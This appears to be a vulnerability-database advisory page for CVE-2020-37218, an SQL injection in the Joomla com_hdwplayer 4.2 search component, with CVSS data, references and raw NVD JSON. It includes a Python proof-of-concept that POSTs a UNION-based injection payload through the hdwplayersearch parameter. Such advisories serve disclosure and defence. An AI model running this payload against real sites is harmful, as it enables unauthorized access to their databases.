CVE-2020-37218

Description

Joomla com_hdwplayer 4.2 contains an SQL injection vulnerability in the search.php file that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the hdwplayersearch parameter. Attackers can submit POST requests with crafted SQL payloads in the hdwplayersearch parameter to extract sensitive database information from the hdwplayer_videos table.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Joomla com_hdwplayer 4.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_cve_2020_37218(target_url):
    """
    PoC for CVE-2020-37218 (Joomla com_hdwplayer SQL Injection)
    """
    # The vulnerable parameter is 'hdwplayersearch' via POST request
    # The endpoint is typically /index.php?option=com_hdwplayer&view=search
    url = f"{target_url}/index.php?option=com_hdwplayer&view=search"
    
    # Malicious payload to test SQL injection
    # Attempting a basic UNION based injection to extract data
    payload_data = {
        "hdwplayersearch": "' UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- -"
    }

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    try:
        response = requests.post(url, data=payload_data, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Check the response content for database errors or leaked data.")
            # Analyze response for SQL syntax errors or data leakage
            if "syntax error" in response.text.lower() or "mysql" in response.text.lower():
                print("[!] Potential SQL vulnerability detected via error message.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1" # Replace with the actual target URL
    exploit_cve_2020_37218(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-37218
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-37218
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-37218/
[4] VulDB https://vuldb.com/cve/CVE-2020-37218
[5] https://www.exploit-db.com/exploits/48242
[6] https://www.hdwplayer.com/
[7] https://www.hdwplayer.com/download/
[8] https://www.vulncheck.com/advisories/joomla-com-hdwplayer-sql-injection-via-search-php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-37218", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:33.153", "lastModified": "2026-05-13T17:07:21.030", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Joomla com_hdwplayer 4.2 contains an SQL injection vulnerability in the search.php file that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the hdwplayersearch parameter. Attackers can submit POST requests with crafted SQL payloads in the hdwplayersearch parameter to extract sensitive database information from the hdwplayer_videos table."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/48242", "source": "[email protected]"}, {"url": "https://www.hdwplayer.com/", "source": "[email protected]"}, {"url": "https://www.hdwplayer.com/download/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/joomla-com-hdwplayer-sql-injection-via-search-php", "source": "[email protected]"}]}}